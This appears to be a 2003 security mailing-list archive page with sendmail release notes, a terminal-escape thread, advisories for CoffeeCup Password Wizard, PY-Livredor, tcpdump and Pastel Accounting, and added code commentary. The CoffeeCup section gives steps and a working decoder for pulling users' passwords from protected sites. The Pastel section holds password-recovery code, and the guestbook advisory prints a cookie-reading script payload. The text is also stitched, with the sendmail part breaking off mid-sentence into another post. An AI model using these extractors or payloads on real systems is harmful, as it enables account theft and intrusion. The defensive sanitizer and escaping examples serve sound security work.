by adding this to your .mc file:

define(`confTO_IDENT', `0s')


For a complete list of changes see the release notes down below.

Please send bug reports to [EMAIL PROTECTED] as usual.

Note: We have changed the way we digitally sign the source code
distributions to simplify verification: in contrast to earlier
versions two .sig files are provided, one each for the gzip'ed
version and the compressed version. That is, instead of signing the
tar file, we sign the compressed/gzip'ed files, so you do not need
to uncompress the file before checking the signature.

This version can be found at

ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.gz
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.gz.sig
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.Z
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.8.tar.Z.sig

and the usual mirror sites.

MD5 signatures:

71b4ce8276536b82d4acdf6ec8be306a sendmail.8.12.8.tar.gz
2ecf7890c2ff5035aed8d342473d85a5 sendmail.8.12.8.tar.gz.sig
b06953b5fd11f9cd63b1eb89625ad881 sendmail.8.12.8.tar.Z
b505fc5b36fbba5b3af2afecb4d587b3 sendmail.8.12.8.tar.Z.sig

You either need the first two files or the third and fourth, i.e.,
the gzip'ed version or the compressed version and the corresponding
.sig file.  The PGP signature was created using the Sendmail Signing
Key/2003, available on the web site (http://www.sendmail.org/) or
on the public key servers.

Since sendmail 8.11 and later includes hooks to cryptography, the
following information from OpenSSL applies to sendmail as well.

   PLEASE REMEMBER THAT EXPORT/IMPORT AND/OR USE OF STRONG CRYPTOGRAPHY
   SOFTWARE, PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING
   TECHNICAL DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME
   PARTS OF THE WORLD.  SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR
   COUNTRY, RE-DISTRIBUTE IT FROM THERE OR EVEN JUST EMAIL TECHNICAL
   SUGGESTIONS OR EVEN SOURCE PATCHES TO THE AUTHOR OR OTHER PEOPLE
   YOU ARE STRONGLY ADVISED TO PAY CLOSE ATTENTION TO ANY EXPORT/IMPORT
   AND/OR USE LAWS WHICH APPLY TO YOU. THE AUTHORS ARE NOT LIABLE FOR
   ANY VIOLATIONS YOU MAKE HERE. SO BE CAREFUL, IT IS YOUR RESPONSIBILITY.

SENDMAIL RELEASE NOTES
  $Id: RELEASE_NOTES,v 8.1340.2.113 2003/02/11 19:17:41 gshapiro Exp $


This listing shows the version of the sendmail binary, the version
of the sendmail configuration files, the date of release, and a
summary of the changes in that release.

8.12.8/8.12.8   2003/02/11
SECURITY: Fix a remote buffer overflow in header parsing by
dropping sender and recipient header comments if the
comments are too long.  Problem noted by Mark Dowd
of ISS X-Force.
Fix a potential non-exploitable buffer overflow in parsing the
.cf queue settings and potential buffer underflow in
parsing ident responses.  Problem noted by Yichen Xie of
Stanford University Compilation Group.
Fix ETRN #queuegroup command: actually start a queue run for
the selected queue group.  Problem noted by Jos Vos.
If MaxMimeHeaderLength is set and a malformed MIME header is fixed,
log the fixup as Fixed MIME header instead of Truncated
MIME header.  Problem noted by Ian J Hart.
CONFIG: Fix regression bug in proto.m4 that caused a bogus
error message: FEATURE() should be before MAILER().
MAIL.LOCAL: Be more explicit in some error cases, i.e., whether
a mailbox has more than one link or whether it is not
a regular file.  Patch from John Beck of Sun Microsystems.


Instructions to extract and apply patch for sendmail 8.12:

The data below is a uuencoded, gzip'ed tar file.  Store the data
between the "begin patch" and "end patch" marker lines into a file
called patch.sm and apply the following command:

uudecode -p < patch.sm | gunzip -c | tar -xf -

This will give you two files:

sendmail.8.12.security.cr.patch
sendmail.8.12.security.cr.patch.sig

Check the integrity of the patch file using 

Cobalt RaQ server appliances

2003-03-03 Thread Florian Effenberger
Hi,

does anybody know a security contact at Sun, especially for the Cobalt RaQ
server appliances?

Thanks,
Florian



RE: Terminal Emulator Security Issues

2003-03-03 Thread Kenn Humborg
 After further investigation, I'd like to point out the following:
 
 Eterm has *never* allowed any control characters in its title/icon
 name sequences.  The following bit of code has existed at least since
 Eterm was first committed to CVS:
 
 else if (ch < ' ')
     return; /* control character - exit */
 
 in term.c::process_xterm_seq(), line 1270 or so.
 
 So there was never any way to get escape sequences in the title to
 begin with, meaning that the command cannot be hidden using any
 character attributes or background/foreground color matching.

What about the CSI character, code 155 (128+27), which DEC terminals
(from at least vt220) interpret as a shorthand for ESC [?

   http://vt100.net/docs/vt220-rm/chapter2.html#S2.5.2

Later,
Kenn
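The three messages on this subject (the Gentoo advisories for eterm and vte at the top of this page, Michael Jennings' point that Eterm discards anything below 0x20 in a title string, and Kenn Humborg's reminder that DEC-style terminals also accept the 8-bit C1 form of CSI, 0x9B) lead to the same practical rule: a program that writes untrusted data to a terminal should strip the control sequences itself rather than rely on the emulator. The Python below is an added example, not code from Eterm, vte or the original report. It removes 7-bit and 8-bit control sequences (CSI, OSC, DCS and the other string introducers, including unterminated ones) and separately detects the pattern the report describes, a title set followed by a title report request (CSI 21t), so a log viewer or cat wrapper can raise an alarm instead of silently cleaning. The sample inputs are constructed.

```python
import re

# Added example (not Eterm, vte or the original report's code): sanitise untrusted text
# before it reaches a terminal, and spot the "set the title, then ask the terminal to
# echo it back" trick (OSC 0/1/2 ... followed by CSI 21t).
# Works on str: decode bytes first (UTF-8 for a UTF-8 terminal, latin-1 for an 8-bit
# one).  In a decoded str, U+0080..U+009F are the C1 controls, so 0x9B really is CSI.

# OSC, DCS, SOS, PM, APC: introducer, arbitrary payload, then BEL / 7-bit ST / 8-bit ST.
# An unterminated string swallows everything to end of input (\Z), which is what the
# terminal would do too, so nothing after it can leak through.
_STRING_SEQ = re.compile(
    r"(?:\x1b[\]PX^_]|[\x9d\x90\x98\x9e\x9f]).*?(?:\x07|\x1b\\|\x9c|\Z)",
    re.DOTALL,
)
# CSI: ESC [ or 0x9B, parameter bytes 0x30-0x3F, intermediates 0x20-0x2F, final 0x40-0x7E.
_CSI_SEQ = re.compile(r"(?:\x1b\[|\x9b)[\x30-\x3f]*[\x20-\x2f]*[\x40-\x7e]?")
# Any other ESC sequence: ESC, optional intermediates, one final byte (ESC c, ESC ( B, ...).
_ESC_SEQ = re.compile(r"\x1b[\x20-\x2f]*[\x30-\x7e]?")
# Leftover C1 controls, and C0 controls other than TAB, LF, CR (DEL included).
_C1 = re.compile(r"[\x80-\x9f]")
_C0 = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")

# Title set: OSC 0 (icon+title), 1 (icon) or 2 (title); title report request: CSI 20t / 21t.
_TITLE_SET = re.compile(r"(?:\x1b\]|\x9d)[012];(.*?)(?:\x07|\x1b\\|\x9c)", re.DOTALL)
_TITLE_REPORT = re.compile(r"(?:\x1b\[|\x9b)2[01]t")


def sanitize(text: str) -> str:
    """Return text with every escape/control sequence removed, 7-bit and 8-bit alike."""
    for pattern in (_STRING_SEQ, _CSI_SEQ, _ESC_SEQ, _C1, _C0):
        text = pattern.sub("", text)
    return text


def injected_title(text: str):
    """If text sets the window title and later asks the terminal to report it (the
    sequence that lands the title on the command line), return the title payload;
    otherwise None."""
    m = _TITLE_SET.search(text)
    if m and _TITLE_REPORT.search(text, m.end()):
        return m.group(1)
    return None


if __name__ == "__main__":
    # Constructed samples: a harmless colour change, the 7-bit attack, Kenn's 8-bit variant.
    samples = [
        "hello\x1b[31mred\x1b[0m\n",
        "\x1b]0;id\x07ls\x1b[21t",
        "\x9d0;id\x07ls\x9b21t",
    ]
    for s in samples:
        print(repr(s), "->", repr(sanitize(s)), "| title attack:", injected_title(s))
```

Decode bytes before calling sanitize(): stripping C1 bytes from raw UTF-8 would corrupt continuation bytes (0x80-0xBF), which is why the function takes str. Note also that the filter is deliberately broader than Eterm's own check: Eterm rejects control characters only inside the title sequence, whereas untrusted data can still set a title through a well-formed OSC and then request the report, which is what injected_title() looks for.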



Re: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions

2003-03-03 Thread Per-Ola Kristiansson
The Java version is also vulnerable. The username, password and secret url
can be extracted from the param 0 in the html code. I wrote a small
program for this purpose a couple of months ago.

Password Wizard java sample: http://www.coffeecup.com/java-password/samples/

<applet code="joylock.class" width="342" height="140">
<param name="GENERATOR" value="CREATED WITH THE APPLET PASSWORD WIZARD WWW.COFFEECUP.COM">
<param name="GENERAL"
value="1|11|004080|FF|wslzebajkcnrvogpquftxhidmyvttp://aaa.jnsseejrp.jny/ywxxce.vtyc| |Login Complete.|Enter the Username and Password.| | |">
<param name="0"
value="6|4|36|0|cftzmapuxnrsjibgwykqvleodhlfegvwcwlczccg://qqq.axbbwwahg.axe/enyyvw.zcev">
</applet>

Best regards,
Per-Ola Kristiansson


- Original Message -
From: Rynho Zeros Web [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, March 01, 2003 12:42 AM
Subject: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
Versions


 + Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
 Versions

 + Product: CoffeeCup Password Wizard All Versions

 + Vendor: CoffeeCup Software, Inc.

 + Site: http://www.coffeecup.com/java-password/

 + About CoffeeCup Password Wizard: Create unlimited password protected
pages

 with unlimited usernames and passwords with CoffeeCup Password Wizard.
 You don't even have to know Flash, Java, or HTML ! Customize the look and
 feel to match your page. You can even point different users to different
 URLs ! Preview within the program or your favorite browser. It's all that
 easy ! All this and more make CoffeeCup Password Wizard the easiest way
 to password protect your pages ! (¿?)

 + Description: Easy obtaining of user names, passwords and a URL giving
  direct access to each user's preferences.

 + Exploit:

 Go to the login panel and view the HTML source code to find the location
 of the .swf file used to log in.

 Example:

 Go to
 https://www.victim.com/billing/

 See sourcecode,

 [...]
 ID="billing" WIDTH=146 HEIGHT=125>
 <PARAM NAME="movie" VALUE="billing.swf">
 <PARAM NAME="quality" VALUE="high">
 [...]

 (https://www.victim.com/billing/billing.swf)

 the password file has the same name as the login file, but with
 the extension .apw

 now, download the file:
 https://www.victim.com/billing/billing.apw (APW is the CoffeeCup Password
 Wizard file)

 finally, open this file with any text editor and you will find all the
 users with their passwords and the URL of direct access to their
 options.

 Example of passwords file:

 - billing.apw ---

 COFFEECUP PASSWORD WIZARD FILE
 WWW.COFFEECUP.COM
 PLEASE DO NOT EDIT

 MOVIE WIDTH:120
 MOVIE HEIGHT:100
 MOVIE FRAME RATE:0
 MOVIE BK COLOR:$00ECECEC
 MOVIE DEFAULT URL:
 MOVIE DEFAULT FRAME:
 MOVIE SWF NAME:billing.swf
 MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis
 Webs\victim.com\new website project\billing\
 MOVIE FONT NAME:MS Sans Serif
 MOVIE FONT SIZE:8
 MOVIE FONT COLOR:clBlack
 MOVIE TRANSPARENT TRUE
 MOVIE VERTICAL TRUE

 USER BOX LEFT:2
 USER BOX TOP:1
 USER BOX WIDTH:116
 USER BOX HEIGHT:34
 USER BOX CAPTION:Username

 PASS BOX LEFT:2
 PASS BOX TOP:36
 PASS BOX WIDTH:116
 PASS BOX HEIGHT:34
 PASS BOX CAPTION:Password

 BUTTON LEFT:15
 BUTTON TOP:78
 BUTTON WIDTH:90
 BUTTON HEIGHT:20
 BUTTON PATH:
 BUTTON TX:1
 BUTTON TY:1

 ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm
 ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm
 [...]
 END

 - billing.apw ---

 Example of user & pass on billing:

 user: anyweb
 pass: xnet0305
 url option panel: https://www.victim.com/billing/anyweb0001.htm


 

 [EOF]

 ---
 Credits: ToOcOoL (http://www.valenciahack.com/)
 ---

 
 Note: sorry by my bad english ;)
 

 --
 XyBØrG
 WebMaster de:
 www.RZWEB.com.ar
 Powered By Dattatec.Com




passwiz.c
Description: Binary data
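
The obfuscation in the Java version is weak enough to undo by hand, and the extractor mentioned above (passwiz.c) is only attached, not shown. The Python below is an added example, not the poster's program and not CoffeeCup code. It is derived from the sample applet parameters quoted above: in every encoded value the first 26 letters are a substitution alphabet (ciphertext letter a..z maps to the letter at that position in the key), the pipe-separated numbers in front give the lengths of user name, password and target URL, and non-letters pass through unchanged; with that reading, "param 0" on the sample page decodes to user "sample", password "test" and the URL http://www.coffeecup.com/middle.html. The HTML parsing helper and the reader for the "ADD USER:" lines of the Flash variant's .apw file are this example's own assumptions about the layout.

```python
import re
from string import ascii_lowercase

# Sample applet parameters as quoted in the post (constructed copy of the
# CoffeeCup sample page values, re-joined across the e-mail line wrap).
PARAM_GENERAL = ("1|11|004080|FF|wslzebajkcnrvogpquftxhidmy"
                 "vttp://aaa.jnsseejrp.jny/ywxxce.vtyc| |Login Complete.|"
                 "Enter the Username and Password.| | |")
PARAM_USER0 = ("6|4|36|0|cftzmapuxnrsjibgwykqvleodh"
               "lfegvwcwlczccg://qqq.axbbwwahg.axe/enyyvw.zcev")

# Constructed HTML in the layout of the sample page (tags and quotes restored).
SAMPLE_HTML = (
    '<applet code="joylock.class" width="342" height="140">\n'
    '<param name="GENERATOR" value="CREATED WITH THE APPLET PASSWORD WIZARD">\n'
    '<param name="GENERAL" value="%s">\n'
    '<param name="0" value="%s">\n'
    '</applet>\n' % (PARAM_GENERAL, PARAM_USER0)
)


def substitute(key, text):
    """Replace each lowercase letter c by key[index of c in a..z].

    Inferred from the sample: the 26-letter prefix is a ciphertext->plaintext
    alphabet; digits and punctuation are not transformed."""
    if sorted(key) != list(ascii_lowercase):
        raise ValueError("key is not a permutation of a..z")
    return text.translate(str.maketrans(ascii_lowercase, key))


def decode_user_param(value):
    """Decode a numbered <param> value: ulen|plen|urllen|flag|key+ciphertext."""
    ulen, plen, urllen, _flag, blob = value.split("|", 4)
    ulen, plen, urllen = int(ulen), int(plen), int(urllen)
    plain = substitute(blob[:26], blob[26:])
    if len(plain) != ulen + plen + urllen:
        raise ValueError("length fields do not match decoded payload")
    return plain[:ulen], plain[ulen:ulen + plen], plain[ulen + plen:]


def decode_general_param(value):
    """The GENERAL param carries one encoded URL in its fifth field,
    using the same 26-letter key scheme (assumed: the default target)."""
    blob = value.split("|")[4]
    return substitute(blob[:26], blob[26:])


_PARAM_RE = re.compile(
    r'<param\s+name="?(\d+)"?\s+value=(?:"([^"]*)"|([^\s>]+))', re.I)


def credentials_from_html(page):
    """Every numbered <param> in the page -> (user, password, url)."""
    found = []
    for _name, quoted, bare in _PARAM_RE.findall(page):
        found.append(decode_user_param(quoted or bare))
    return found


def credentials_from_apw(text):
    """Flash variant: each 'ADD USER:' line of the .apw file holds user,
    password and per-user URL separated by whitespace (assumed layout; the
    first token is kept verbatim, including any leading flag digit)."""
    rows = []
    for line in text.splitlines():
        if line.startswith("ADD USER:"):
            parts = line[len("ADD USER:"):].split()
            if len(parts) >= 3:
                rows.append((parts[0], parts[1], parts[2]))
    return rows


if __name__ == "__main__":
    for user, pw, url in credentials_from_html(SAMPLE_HTML):
        print("user=%s password=%s url=%s" % (user, pw, url))
    print("default url:", decode_general_param(PARAM_GENERAL))
```

Because the key travels with the ciphertext, the scheme is reversible by anyone who can read the page source; the only fix is to keep the credential check on the server.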


[SCSA-008] Cross Site Scripting Script Injection Vulnerability in PY-Livredor

2003-03-03 Thread Grégory




Security Corporation Security Advisory [SCSA-008]


PROGRAM: PY-Livredor
HOMEPAGE: http://www.py-scripts.com
   http://www.scripts-php.com
VULNERABLE VERSIONS: v1.0


DESCRIPTION


PY-Livredor is an easy guestbook script using Php4 and MySql with
an administration which allow messages deletion.


DETAILS


A Cross-Site Scripting vulnerability has been found in PY-Livredor
which allows attackers to inject script code into the guestbook and
have it run in visitors' browsers as if it were provided by the website.

This Cross-Site Scripting vulnerability is found in the page for
posting messages (index.php).

An attacker can input specially crafted links and/or other
malicious scripts.


EXPLOIT


A vulnerability was discovered in the page for posting messages,
at this address:

http://[target]/livredor/index.php


The vulnerability lies in the handling of the titre, Votre pseudo,
Votre e-mail and Votre message fields.

Inserting a hostile script in any of these fields makes it possible
for a malicious user to have that script run in the browser of every
visitor who views the guestbook.


The hostile code could be:

[script]alert("Cookie="+document.cookie)[/script]

(opens a window showing the visitor's cookie)

(replace [ and ] by < and >)


SOLUTIONS


No solution for the moment.


VENDOR STATUS


The vendor has reportedly been notified.


LINKS


http://www.security-corp.org/index.php?ink=4-15-1

Version Française :

http://www.security-corp.org/advisories/SCSA-008-FR.txt



Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
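
An added example, not PY-Livredor's code (the script itself is PHP; this is a Python sketch of the same rendering step): the vulnerable rendering path that copies the four fields into the page verbatim, next to a hardened version that HTML-escapes each value for the context it lands in and only builds a mailto: link when the address passes a narrow check. The guestbook entry, the template and the address pattern are constructed for the example; the title field carries the probe from the advisory.

```python
import html
import re

# Constructed guestbook post: the advisory's probe in the title field,
# plus an e-mail field that tries to break out of an href attribute.
PROBE = '<script>alert("Cookie="+document.cookie)</script>'
POST = {
    "titre": PROBE,
    "pseudo": "visiteur",
    "email": 'x@example.test" onmouseover="alert(1)',
    "message": "Bonjour <b>tout le monde</b>",
}

# Hypothetical, deliberately narrow address check: only a plain local@domain
# without quotes, angle brackets or whitespace is allowed into an href.
_ADDR_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

TEMPLATE = ('<div class="msg"><h3>{titre}</h3>'
            '{author}<p>{message}</p></div>')


def render_unsafe(post):
    """Reproduces the flaw: every field is copied into the page verbatim."""
    author = '<a href="mailto:{email}">{pseudo}</a>'.format(**post)
    return TEMPLATE.format(titre=post["titre"], author=author,
                           message=post["message"])


def render_safe(post):
    """Hardened: HTML-escape each field (quotes included, so attribute
    context is covered too) and only build a mailto: link when the
    address passes the whitelist check."""
    esc = {k: html.escape(v, quote=True) for k, v in post.items()}
    if _ADDR_RE.match(post["email"]):
        author = '<a href="mailto:{email}">{pseudo}</a>'.format(**esc)
    else:
        author = esc["pseudo"]
    return TEMPLATE.format(titre=esc["titre"], author=author,
                           message=esc["message"])


if __name__ == "__main__":
    print(render_unsafe(POST))
    print(render_safe(POST))
```

The PHP counterpart of `html.escape(v, quote=True)` is `htmlspecialchars($v, ENT_QUOTES)` applied at output time to each of the four fields; stripping `<script>` on input alone does not cover the attribute case shown by the e-mail field.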




MDKSA-2003:027 - Updated tcpdump packages fix denial of service vulnerabilities

2003-03-03 Thread Mandrake Linux Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



Mandrake Linux Security Update Advisory


Package name:   tcpdump
Advisory ID:MDKSA-2003:027
Date:   March 3rd, 2003

Affected versions:  8.1, 8.2, 9.0, Corporate Server 2.1,
Multi Network Firewall 8.2,
Single Network Firewall 7.2


Problem Description:

 A vulnerability was discovered by Andrew Griffiths and iDEFENSE Labs
 in the tcpdump program.  By sending a specially crafted network packet,
 an attacker is able to cause tcpdump to enter an infinite loop.  In
 addition, the tcpdump developers found a potential infinite loop when
 tcpdump parses malformed BGP packets.  A buffer overflow was also
 discovered that can be exploited with certain malformed NFS packets.


References:
  
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0108


Updated Packages:
  
 Corporate Server 2.1:
 9df719dae2bffe49798156e87e875301  corporate/2.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
 fa7813f3afb1df4b3c00b73a198a53db  
corporate/2.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
 b32457602c61c0febcfc2e511373b517  corporate/2.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
 2a5ba8809cc1b919e14eda315a6340b7  corporate/2.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  corporate/2.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Mandrake Linux 8.1:
 785f18da90ecf009c38d8e9e01216756  8.1/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
 512599ad54b47f70f54d722e7618ac45  8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
 01ab2770370dd94c1946b476df624fb7  8.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
 2a5ba8809cc1b919e14eda315a6340b7  8.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  8.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Mandrake Linux 8.1/IA64:
 b6de1971e7852f1f1255dcf237af3cde  ia64/8.1/RPMS/libpcap0-0.7.2-1.1mdk.ia64.rpm
 de264fee1447af71141926878c93512e  ia64/8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.ia64.rpm
 7dc035a9f8e8c14d80b27517ea52597f  ia64/8.1/RPMS/tcpdump-3.7.2-1.1mdk.ia64.rpm
 2a5ba8809cc1b919e14eda315a6340b7  ia64/8.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  ia64/8.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Mandrake Linux 8.2:
 a86ae9c1f7d281382daf0a748b0cc192  8.2/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
 24fe4d16b5e81d825fa6648a84997d84  8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
 84e2ee00e25cb8e54d6efd98e20bd036  8.2/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
 2a5ba8809cc1b919e14eda315a6340b7  8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Mandrake Linux 8.2/PPC:
 843c2d96494d413e96dee63c6eb013c8  ppc/8.2/RPMS/libpcap0-0.7.2-1.1mdk.ppc.rpm
 112ca43b4c261593d5667dc44c17c700  ppc/8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.ppc.rpm
 635d8576811efaee84d2c3608752669d  ppc/8.2/RPMS/tcpdump-3.7.2-1.1mdk.ppc.rpm
 2a5ba8809cc1b919e14eda315a6340b7  ppc/8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  ppc/8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Mandrake Linux 9.0:
 9df719dae2bffe49798156e87e875301  9.0/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
 fa7813f3afb1df4b3c00b73a198a53db  9.0/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
 b32457602c61c0febcfc2e511373b517  9.0/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
 2a5ba8809cc1b919e14eda315a6340b7  9.0/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  9.0/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Multi Network Firewall 8.2:
 a86ae9c1f7d281382daf0a748b0cc192  mnf8.2/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm
 24fe4d16b5e81d825fa6648a84997d84  mnf8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm
 84e2ee00e25cb8e54d6efd98e20bd036  mnf8.2/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm
 2a5ba8809cc1b919e14eda315a6340b7  mnf8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm
 5129421a6ff6b84a4e4faae0119cfb23  mnf8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm

 Single Network Firewall 7.2:
 ea11a1e2673e0f2da584f08c83ac86a7  snf7.2/RPMS/libpcap-0.7.2-0.1mdk.i586.rpm
 972bdf436bdece0078fafcddcaee7c85  snf7.2/RPMS/libpcap-devel-0.7.2-0.1mdk.i586.rpm
 c96c4ae08580e72334da63a306168c41  snf7.2/RPMS/tcpdump-3.7.2-0.1mdk.i586.rpm
 971d86767061c5804ddb3cf7de5ab167  snf7.2/SRPMS/libpcap-0.7.2-0.1mdk.src.rpm
 9fb87d3952bf381e5ad552d16baea15b  snf7.2/SRPMS/tcpdump-3.7.2-0.1mdk.src.rpm


Bug IDs fixed (see https://qa.mandrakesoft.com for more information):


To upgrade automatically, use MandrakeUpdate.  The verification of md5
checksums and GPG signatures is performed automatically for you.

If 

Re: Cobalt RaQ server appliances

2003-03-03 Thread Alan Coopersmith
On Mon, Mar 03, 2003 at 06:26:20PM +0100, Florian Effenberger wrote:
 does anybody know a security contact at Sun, especially for the Cobalt RaQ
 server appliances?

[EMAIL PROTECTED] is the best place to contact for any and all Sun
security issues.

For sensitive information, their PGP key is available at
http://sunsolve.sun.com/pub-cgi/show.pl?target=security/sec


Alan Coopersmith  [EMAIL PROTECTED]
http://www.CSUA.Berkeley.EDU/~alanc/   aka: [EMAIL PROTECTED]
  Working for, but definitely not speaking for, Sun Microsystems, Inc.


[blaqhatz] - Pastel Accounting application security issues

2003-03-03 Thread l33t guy
See attached.

-BEGIN PPP SIGNED MESSAGE-
Hash: SH1T

 
--blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz--


[EMAIL PROTECTED]@[EMAIL PROTECTED] ADVISORY [EMAIL PROTECTED]@[EMAIL PROTECTED]

blaqhatz advisory #1
date: third day of march, in the year of our lord
 two thousand and three (03/03/03)
why today? coz we love 303, oh! oh! oh! 
http://www.only4jewz.net/efil4zaggin/blaqhatz.advisory.20030303

blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-b
l  l
a  ,-.||  || //\\   /|||\  ||  ||  //\\ || |/  a
q /`-'\   ||   )) ||//  \\ ||   || ||  || //  \\  ||  //   q
|  .-/ \-,  ||/\ ||   || || /\  || //|
b (  `.___.'  )   ||   )) ||||  || ||   || ||  || ||  ||  ||// b
l  `. _ .'||  | ||  ||  \|||\\ ||  || ||  ||  ||   /|  l
a\\a 
q-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq



PRODUCT: PASTEL ACCOUNTING v6.0-6.12 (confirmed)
 earlier versions (suspected)


1. BACKGROUND

Pastel Accounting is an accounting package widely used by small business entities in 
countries in Africa, Europe, the Middle and Far East and Australasia. The Pastel 
product includes a facility for secure access to specific modules within the product.

Further information is available @ http://www.pastel.com


2. PROBLEM DESCRIPTION

The security system and application controls used by the Pastel product are broken.

All user and security information is stored in the file ACCUSER.DAT within the 
chosen client folder. Nothing in this file is encrypted, nor is any version/validity 
checking done against it.

As such, it is possible to replace the ACCUSER.DAT file with one from a different set 
of accounts with known usernames and passwords, access and modify the data stored 
within a specific set of accounts, and then restore the original file, leaving no 
concrete record of who modified the files.

In some contexts, it would even be possible to falsify records in an attempt to 
'frame' a particular user with changes.

Additionally, some preliminary testing on the accuser.dat file displayed an alarming 
correlation between certain sections of the file and the passwords chosen. For 
example, given a group of users with chosen passwords , , 
, , and ABCDEFGH, the following strings were found in the file: 
, , , , and stuvwxyz.

3. IMPACT

Users may not rely on the application level controls implemented by the Pastel 
Accounting package.

As no reliance may be placed on application level controls, auditors must audit around 
the application.


4. FIX

None as of yet. Vendor notified.

5. WHO ARE BLAQHATZ?
blaqhatz are:

pheer - pheerless
 - skankyvontrashbag - skankette - nyama_zinto -
 rod-boi - pheered - minibyte - whoot - pofmuis


 
--blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz--



   [EMAIL PROTECTED] blaqhatz [EMAIL PROTECTED]


 mailto:[EMAIL PROTECTED]

telling us who and what you are and with a good reason as to why you think you're leet 
enough to join blaqhatz

  Why should I join?

1. Everyone else thinks blaqhatz 0wn.
2. blaqhatz have been interviewed by more international legal authorities, seen the 
inside of more networks and more telco's, been on more television shows, been asked to 
assist more national intelligence agencies and skewled more people than any other 
group. **blaqhatz are *the* authority on modern information security**
3. We're nice people.
4. You can get sekret, blaqhatz warez, for free, just for applying.
5. You value security and 0day. You believe in freedom of information. You believe in 
helping others help themselves. blaqhatz will help you act to make your beliefs a reality.
6. We're only accepting new member applications until the 9th of the 3rd, 2000 & 3, on a 
first come, first served basis. All members will need to be approved by the elite 
blaqhatz board.

Big ups, shout outs and serious ruspek go to:
~el8, BoW, #havok, phrack.org, kouriers 4 christ, #hack krew, oldskewl efnet 
#phreakGER, effkay, arclight, maelstrom, ganja_man, scavenger, mindbinder, raw liquid, 
tonedef, y0y0y0 and c0.

r0qin' 1t iN [EMAIL PROTECTED
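
The ABCDEFGH / stuvwxyz pairing reported above is consistent with each password byte being stored plus a constant (0x73 - 0x41 = 50). That is one reading of a single data point, not something the advisory establishes. The Python below is an added example, not blaqhatz's or Pastel's code, for testing that hypothesis against a copy of ACCUSER.DAT you are entitled to inspect: it finds every window of the file that equals a password you know under some constant byte shift, then applies the recovered shift to the whole file and lists the printable runs, which is where any other accounts' passwords would show up if the hypothesis holds. The file slice is constructed; the real layout is not published.

```python
# Constructed stand-in for a slice of ACCUSER.DAT. The only published data
# point is "ABCDEFGH" appearing as "stuvwxyz"; a second record is added with
# the password "Pastel99" stored under the same +50 shift.
SAMPLE_BLOB = (b"\x01\x00USER01\x00\x00stuvwxyz\x00\x00"
               b"USER02\x00\x00\x82\x93\xa5\xa6\x97\x9ekk\x00")


def constant_shift_hits(password, blob):
    """Return [(offset, shift)] for every window of blob that equals
    `password` with one constant value added (mod 256) to each byte.
    A shift of 0 means the password is stored in the clear."""
    n = len(password)
    hits = []
    for pos in range(len(blob) - n + 1):
        window = blob[pos:pos + n]
        shift = (window[0] - password[0]) % 256
        if all((w - p) % 256 == shift for w, p in zip(window, password)):
            hits.append((pos, shift))
    return hits


def unshift(data, shift):
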